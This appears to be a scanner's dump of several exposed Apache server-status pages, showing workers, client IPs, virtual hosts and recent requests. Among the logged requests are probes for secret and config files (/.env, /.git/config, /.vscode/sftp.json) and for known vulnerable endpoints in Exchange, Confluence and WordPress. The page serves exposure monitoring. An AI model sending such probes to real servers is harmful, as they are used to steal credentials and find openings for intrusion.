172.69.234.174h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-85532155880/56/48381_ 10.791995357889880.01.521104.59 172.69.234.160h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-85532155880/61/49868_ 10.792000266581710.01.361187.39 172.69.234.160h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-85532155890/58/51664_ 10.511990337001700.01.301336.51 172.69.234.179h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-85532155890/63/52182_ 10.5519663262892720.04.292663.12 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-85532155890/42/50443_ 9.841970246489990.00.731118.85 172.68.192.220h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-85532155890/57/50564_ 10.541910361155860.01.471044.57 172.69.234.153h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-85532155890/42/51190_ 10.541972318338880.00.911274.13 172.69.234.164h2l
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8154c978f
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 28-Apr-2024 21:13:32 CEST Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 840 Parent Server MPM Generation: 839 Server uptime: 88 days 9 hours 30 minutes 33 seconds Server load: 1.02 1.13 1.19 Total accesses: 2468324 - Total Traffic: 61.0 GB - Total Duration: 1459507235 CPU Usage: u246.67 s332.49 cu12979.2 cs9233.67 - .298% CPU load .323 requests/sec - 8.4 kB/second - 25.9 kB/request - 591.295 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03159089no0yes010000 13159090no0yes010000 23159221no1yes19000 33159091no0yes010000 43159092no0yes010000 Sum501 149000 _________________________W________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-83931590890/32/47965_ 4.0680234391790.00.561110.93 138.68.82.23http/1.1 0-83931590890/25/48922_ 4.063820261957600.00.511101.16 172.70.224.157h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-83931590890/30/48261_ 3.753830315011970.00.841197.81 172.68.193.180h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-83931590890/84/48317_ 3.853820275749490.00.841073.75 198.41.224.156h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-83931590890/24/46857_ 3.894520229830980.00.631058.90 172.71.160.76h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-83931590890/56/46910_ 3.91447281237036760.00.661144.32 172.71.160.2h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-83931590890/29/47571_ 4.0938325210963240.00.621026.51 51.178.207.154h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-83931590890/23/47528_ 3.98447717362156180.00.471060.56 141.101.69.48h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-83931590890/28/48155_ 3.894470248819820.00.491042.69 198.41.242.189h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-83931590890/26/49302_ 3.9160225928150.00.382490.45 138.68.82.23http/1.1 1-83931590900/15/54589_ 3.274410251553730.00.731272.42 172.71.160.26h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-83931590900/11/54731_ 3.24811347292790.00.131195.09 138.68.82.23h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-83931590900/11/54009_ 3.232750322274560.00.081122.18 198.41.242.217h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-83931590900/15/54381_ 3.432800269497830.00.671316.12 172.69.222.119h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-83931590900/19/54444_ 3.3850581035190.01.311212.59 108.162.245.162h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-83931590900/16/52624_ 3.204460405464000.00.051325.74 198.41.224.150h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-83931590900/18/53496_ 3.382750287866610.00.251276.20 172.70.224.148h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-83931590900/14/54040_ 3.2676334878970.00.241100.14 138.68.82.23h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-83931590900/12/55640_ 3.5051320589160.00.031349.27 138.68.82.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-83931590900/20/54236_ 3.224412296197200.00.091176.31 198.41.242.172h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-83931592210/250/45084_ 12.47227243115330.02.101017.38 79.158.64.9h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-83931592210/266/46660_ 12.4800249668160.03.101088.33 138.68.82.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-83931592210/225/47548_ 12.5000236462350.03.271015.05 138.68.82.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-83931592210/271/45891_ 12.5010330441150.03.912471.40 138.68.82.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-83931592210/245/46149_ 12.25136227337280.02.501189.06 79.158.64.9h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-83931592210/215/46032W 12.4800316674450.02.481021.43 138.68.82.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-83931592210/259/45691_ 12.4920239812710.02.442438.52 138.68.82.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-83931592210/300/45730_ 12.4812229117680.03.511079.47 138.68.82.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-83931592210/215/46258_ 12.46019253326920.03.111047.61 79.158.64.9h2relehse.com:443idle, streams: 0/81/81/0/0 (open/recv/resp/push/rst) 2-83931592210/215/45611_ 12.5020300483910.03.141008.40 138.68.82.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-83931590910/34/48569_ 4.6619823262981620.00.821184.22 173.208.190.26http/1.1relehse.com:443GET /login HTTP/1.1 3-83931590910/25/48008_ 4.518752234261740.00.281190.52 138.68.82.23http/1.1 3-83931590910/25/49432_ 4.43193177347730270.00.201148.89 172.69.222.218h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-83931590910/87/49240_ 4.681311071410057690.00.751175.26 108.162.237.122h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-83931590910/32/48217_ 4.66628300697540.00.461037.54 138.68.82.23http/1.1 3-83931590910/25/49338_ 4.641260277927600.01.571223.36 172.71.222.202h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-83931590910/74/48207_ 4.56193563277962650.00.981236.48 172.71.22.38h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-83931590910/32/48184_ 4.62193511328357130.01.091056.33 172.69.58.17h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-83931590910/26/47692_ 4.531260355764200.00.171055.65 122.228.8.181http/1.1relehse.com:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-83931590910/37/48944_ 4.588659264653000.00.891158.82 138.68.82.23h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-83931590920/15/50633_ 3.279401333134190.00.341275.42 172.71.160.85h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-83931590920/17/50967_ 3.347512260661190.013.892641.56 134.0.10.229http/1.1barrerasdecontencion.com:443GET /wp-cron.php HTTP/1.1 4-83931590920/16/49445_ 3.284470244336890.00.171102.28 172.71.160.123h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-83931590920/14/49257_ 3.2780358745480.00.161024.11 138.68.82.23h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-83931590920/16/49851_ 3.414520316048490.00.411252.32 172.70.224.156h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-83931590920/13/48727_ 3.277511277646800.00.421092.40 134.0.10.229http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc852dc234f
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 18-Apr-2024 23:27:41 CEST Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 743 Parent Server MPM Generation: 742 Server uptime: 78 days 11 hours 44 minutes 42 seconds Server load: 0.05 0.11 0.13 Total accesses: 2197616 - Total Traffic: 55.0 GB - Total Duration: 1278804614 CPU Usage: u214.73 s296.28 cu11688.7 cs8497.21 - .305% CPU load .324 requests/sec - 8.5 kB/second - 26.2 kB/request - 581.905 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02805088no0yes010000 12805117no1yes19000 22804981no0yes010000 32804980no0yes010000 42804979no0yes010000 Sum501 149000 _____________W____________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-74228050880/45/42812_ 4.770830212851920.00.441013.06 146.190.63.248h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-74228050880/43/43225_ 4.9910242497380.01.45973.65 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-74228050880/44/42962_ 4.8330282862140.01.301068.55 146.190.63.248http/1.1 0-74228050880/43/42784_ 4.8300255014530.01.08965.58 146.190.63.248h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-74228050880/39/41920_ 4.9920211939510.01.04933.00 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-74228050880/44/41933_ 4.924159214048070.013.211002.47 146.190.63.248http/1.1 0-74228050880/45/42088_ 4.9910191521680.00.63901.54 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-74228050880/36/42473_ 4.9900343861110.00.26928.05 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-74228050880/36/42810_ 4.7510229459620.00.27912.98 198.41.224.225h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-74228050880/42/43781_ 5.0000207110880.00.372359.06 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-74228051170/65/49934_ 5.97261927225849050.01.391131.00 172.68.27.28h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-74228051170/66/49647_ 5.90630312529340.00.981099.33 146.190.63.248h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-74228051170/65/49093_ 6.1130298382210.00.811025.39 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-74228051170/62/49783W 6.0200245051330.00.881191.17 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-74228051170/66/49247_ 6.0831213385083840.01.571115.59 172.69.67.141h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-74228051170/59/47682_ 6.0451091369900530.00.661207.57 146.190.63.248http/1.1 1-74228051170/69/48618_ 6.0526720264102230.01.461189.60 172.70.175.85h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-74228051170/64/49502_ 5.865480305272360.01.05968.67 146.190.63.248http/1.1 1-74228051170/59/51235_ 6.052634299274420.01.391204.93 172.71.186.48h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-74228051170/59/49343_ 6.0450261979530.00.571082.52 146.190.63.248http/1.1 2-74228049810/6/39441_ 2.853260214913790.00.01898.57 198.41.230.115h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/4/40670_ 2.923260225772350.00.01969.75 172.69.195.143h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/7/41259_ 1.713310213734010.00.05866.22 64.225.75.246http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/7/40092_ 3.223250258356460.00.012343.35 172.68.19.142h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/7/40339_ 3.223310203135370.00.691019.34 172.71.238.174h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/6/39924_ 2.953260291732070.00.15906.65 172.69.43.146h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/7/39745_ 2.853310198043190.00.102328.15 198.41.230.201h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/7/40094_ 2.943310207287220.00.03974.82 172.69.194.63h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/7/40589_ 3.163260223250370.00.05883.56 198.41.224.229h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-74228049810/8/39563_ 3.223260275390070.00.07867.03 172.68.19.98h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/10/44011_ 2.245260237764530.00.051089.39 172.69.11.144h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/9/43064_ 2.875264212969050.00.171078.74 172.69.195.106h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/10/44364_ 2.833250254317980.00.07986.42 172.69.194.4h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/9/44041_ 2.8610963370376690.00.071054.91 172.69.195.190h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/6/43643_ 3.213300248931130.00.08936.89 172.71.10.208h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/12/44391_ 2.865311238428050.00.101080.44 172.69.194.59h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/8/43288_ 3.125310255700160.00.391103.22 198.41.224.219h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/8/42964_ 2.16325103303773240.00.03913.48 64.225.75.246http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/8/42606_ 2.2410960295059900.00.16942.19 46.105.97.186http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-74228049800/13/43812_ 2.845260213503260.00.211019.78 172.69.194.108h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-74228049790/11/44900_ 2.883310264372780.00.071112.58 172.69.195.166h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-74228049790/11/44411_ 3.2820226326830.00.432497.62 146.190.63.248http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-74228049790/10/43401_ 2.8610890216620280.00.12986.18 172.69.195.192h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-74228049790/6/43487_ 2.481089232313903260.00.07934.11 172.71.98.12h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-74228049790/6/43650_ 2.783260270196740.00.061112.67 198.41.230.13h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-74228049790/11/42781_ 3.163310251104000.00.22992.30 172.71.238.2h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/r
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8b1d5279d
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 21-Mar-2024 17:20:50 CET Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 474 Parent Server MPM Generation: 473 Server uptime: 50 days 6 hours 37 minutes 51 seconds Server load: 0.15 0.09 0.09 Total accesses: 1485135 - Total Traffic: 38.8 GB - Total Duration: 807524036 CPU Usage: u256.07 s261.83 cu7389.48 cs5355.18 - .305% CPU load .342 requests/sec - 9.4 kB/second - 27.4 kB/request - 543.738 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01265364no1yes010000 11265497no1yes010000 21265363no0yes010000 31265366no1yes010000 41265365no1yes19000 Sum504 149000 ________________________________________________W_ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-47312653640/827/28407_ 52.151828114714680.010.16654.31 79.155.252.122h2relehse.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-47312653640/866/28480_ 52.142152154635840.014.05638.97 79.155.252.122h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-47312653640/1007/28583_ 51.9810180257500.014.29719.81 172.105.128.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-47312653640/924/27923_ 52.101219150408350.011.30644.46 185.38.129.94h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-47312653640/868/27714_ 51.856174115637670.012.48631.95 172.105.128.12http/1.1 0-47312653640/1026/27790_ 52.021321106425200.025.65592.54 194.224.76.162h2relehse.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-47312653640/1053/27627_ 51.861063123445910.012.71535.39 206.189.19.19h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-47312653640/842/27736_ 52.121504234771740.022.35615.75 172.64.236.106h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-47312653640/993/28580_ 52.15650156442440.024.62595.06 194.224.76.162h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-47312653640/1182/29242_ 52.15204093496130.015.262041.52 79.155.252.122h2relehse.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-47312654970/1239/32628_ 57.55926125302010.019.13704.30 206.189.19.19http/1.1 1-47312654970/921/32460_ 57.56132193607340.014.38680.79 79.155.252.122h2relehse.com:443idle, streams: 0/11/11/0/0 (open/recv/resp/push/rst) 1-47312654970/1171/32108_ 57.57041169590530.016.48682.79 79.155.252.122h2relehse.com:443idle, streams: 0/14/14/0/0 (open/recv/resp/push/rst) 1-47312654970/977/31636_ 57.568220154061480.013.38734.92 206.189.19.19h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-47312654970/1488/32500_ 57.57197307764600.022.89684.73 79.155.252.122h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-47312654970/1429/30660_ 57.6130239675440.019.47805.12 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-47312654970/1381/32021_ 57.61126141439650.021.03791.17 162.158.129.242h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-47312654970/977/32137_ 57.6110187355120.017.94621.96 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-47312654970/1204/34501_ 57.611691188860080.017.32791.82 172.70.57.175h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-47312654970/1273/31104_ 57.579109139094990.020.15682.39 206.189.19.19h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-47312653630/186/24694_ 27.606150141717760.02.97543.51 13.70.94.197http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-47312653630/255/26247_ 27.5514161145642580.04.36626.49 13.70.94.197http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-47312653630/234/26753_ 27.546148143044310.02.33582.41 79.155.252.122h2relehse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-47312653630/216/25808_ 27.846643185837100.05.382031.33 79.155.252.122h2relehse.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-47312653630/249/26658_ 27.5914159122612620.03.03680.47 13.70.94.197http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-47312653630/250/25986_ 27.801460151701860.05.62607.47 172.64.238.74h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-47312653630/186/25880_ 27.8630122897910.05.671981.12 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-47312653630/179/26330_ 27.83702785527540.03.34670.50 79.155.252.122h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-47312653630/190/27037_ 27.5410106135114050.05.34613.57 206.189.19.19h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-47312653630/192/25380_ 27.54150129087030.03.46585.88 79.155.252.122h2relehse.com:443done, streams: 0/7/7/0/0 (open/recv/resp/push/rst) 3-47312653660/495/30539_ 32.771020148343820.06.32742.82 185.38.129.94h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/306/29753_ 33.00150151967280.07.44779.47 172.64.236.24h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/334/30882_ 32.92100184155900.03.99669.24 108.162.212.158h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/335/30516_ 33.0141223290370.05.10728.91 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-47312653660/502/30392_ 32.731555164928840.019.76681.91 13.70.94.197http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/457/30661_ 32.8841066161962560.06.56720.43 172.70.230.242h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/398/30040_ 32.618111157915320.04.39794.37 206.189.19.19http/1.1 3-47312653660/331/29612_ 32.948691157981930.03.48634.39 206.189.19.19http/1.1 3-47312653660/312/28719_ 32.731056174443600.05.00631.96 206.189.19.19h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-47312653660/407/29645_ 32.67100163089420.06.55749.59 206.189.19.19http/1.1 4-47312653650/331/32476_ 33.9310212586560.07.18834.70 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-47312653650/468/32886_ 33.87717156566280.07.512165.07 194.224.76.162h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-47312653650/398/31800_ 33.917586158191630.018.76713.85 172.64.238.153h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-47312653650/299/31855_ 33.9320154228830.04.40630.48 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-47312653650/348/31732_ 33.9111203900280.06.05783.91 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-47312653650/448/30750_ 33.9400176186580.08.20689.46 206.189.19.19http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc830e76f1b
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 09-Mar-2024 19:12:14 CET Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 357 Parent Server MPM Generation: 356 Server uptime: 38 days 8 hours 29 minutes 16 seconds Server load: 0.21 0.09 0.03 Total accesses: 1056835 - Total Traffic: 31.3 GB - Total Duration: 608951438 CPU Usage: u99.6 s139.35 cu5591.14 cs4110.68 - .3% CPU load .319 requests/sec - 9.9 kB/second - 31.0 kB/request - 576.203 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0645356no1yes19000 1645358no1yes19000 2645355no0yes010000 3645487no1yes010000 4645357no0yes010000 Sum503 248000 ______R________W__________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3566453560/3/19520_ 0.020088728310.00.00520.80 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-3566453560/4/19239_ 0.0200115014380.00.01472.63 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-3566453560/0/19230_ 0.00058144048080.00.00573.13 64.226.78.121h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-3566453560/1/19051_ 0.0200107938300.00.00465.11 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-3566453560/0/19141_ 0.000084803090.00.00505.83 138.68.86.32h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-3566453560/2/18675_ 0.020084425450.00.01445.53 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-3566453560/3/18852R 0.020096830290.00.00385.98 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 0-3566453560/2/18572_ 0.0200208162450.00.00462.27 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-3566453560/1/19632_ 0.0200131753920.00.00447.70 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 0-3566453560/1/19732_ 0.020064033770.00.001882.29 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 1-3566453580/2/20621_ 0.020095189340.00.00501.11 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 1-3566453580/2/20651_ 0.0200140505260.00.00481.67 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 1-3566453580/1/20129_ 0.020074158640.00.00479.98 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 1-3566453580/2/20591_ 0.020099212360.00.00555.97 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 1-3566453580/1/20324_ 0.0100269680970.00.00501.67 64.226.78.121http/1.1 1-3566453580/0/19235W 0.0000206818130.00.00552.13 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-3566453580/1/20811_ 0.0200113602740.00.00595.56 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 1-3566453580/2/20770_ 0.0200144465940.00.00425.79 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / 